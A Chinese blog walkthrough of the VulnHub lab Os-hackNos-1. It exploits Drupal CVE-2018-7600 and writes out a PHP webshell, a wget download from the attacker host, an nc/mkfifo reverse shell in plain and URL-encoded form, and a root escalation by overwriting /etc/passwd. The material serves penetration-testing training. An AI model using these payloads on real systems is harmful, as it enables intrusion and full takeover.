vulnhub靶场Os-hackNos-1

0x000 靶场描述


难度:简单到中级
标志 : 2 标记第一个用户和第二个根
学习:利用|网络应用程序|枚举|权限提升
网站 : www.hackNos.com
邮件 :contact@hackNos.com


0x001 靶场下载


https://www.vulnhub.com/entry/hacknos-os-hacknos,401/


0x002 信息收集


探测存活主机

netdiscover -r 192.168.43.0/24

端口扫描

nmap -sS -sV -A -p 1-65535 192.168.43.55

发现开放了 22 和 80 端口,访问80端口,发现是一个ubuntu的默认静态页面,尝试访问robots.txt文件未果。。。

目录扫描

dirsearch -u http://192.168.43.55

发现 http://192.168.43.55/drupal/ 页面,尝试弱口令登陆,失败;继续进行目录扫描

Drupal:是开源CMS之一,Drupal是CMS内容管理系统

dirsearch -u http://192.168.43.55/drupal/

逐个访问进行查看,在 http://192.168.43.55/drupal/CHANGELOG.txt 页面发现了当前系统版本是7.57,搜索一下关于这个版本的漏洞,发现存在远程命令执行漏洞。

exp下载地址:https://github.com/pimps/CVE-2018-7600


0x003 利用CVE-2018-7600漏洞getshell


写一个一句话木马cmd.php

<?php system($_POST[cmd]);?>

kali开启http服务

python -m http.server 80

使用exp将木马文件远程下载到靶机

python drupa7-CVE-2018-7600.py http://192.168.43.55/drupal/ -c "wget http://192.168.43.253/cmd.php"

然后burpsuite抓取cmd.php的包,改为POST

使用nc命令反弹一个shell

这里为什么要反弹shell,而不直接用蚁剑连接的原因是:这里靶场对终端进行了限制,用蚁剑或者msf后面对提权操作有影响

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.55 8888 >/tmp/f

通过URL编码将/、;、> 编码为如下格式,否则会失败

rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+192.168.43.253+8888+%3e%2ftmp%2ff

kali设置监听

nc -lvnp 8888

成功获取到shell,使用如下命令切换至交互模式

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前权限,发现是www-data


0x004 权限提升


查看网站根目录,发现 alexander.txt 文件,查看文件内容,发现是一些密文,使用 base64解密后,发现还有一层加密,使用 https://www.splitbrain.org/services/ook 成功解密,发现是账号密码。

前面扫描到了22端口,现在又得到了账号和密码,感觉起飞了,然后ssh远程登陆,提示拒绝登陆;此路不通,重新找提权点。

尝试使用suid权限提权

find / -perm -u=s -type f 2>/dev/null

发现 /etc/passwd 具有root权限,尝试替换passwd文件

kali制作passwd文件

perl -le 'print crypt("123456","addedsalt")'

test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash 添加到 /etc/passwd 文件中

然后使用wget命令远程下载替换

wget http://192.168.43.253/passwd -O /etc/passwd

查看passwd文件,发现替换成功

su test

提权成功


0x005 查找flag


cat /home/james/user.txt

cat /root/root.txt

posted @ 2022-11-17 21:30  Cx330Lm  阅读(36)  评论(0编辑  收藏  举报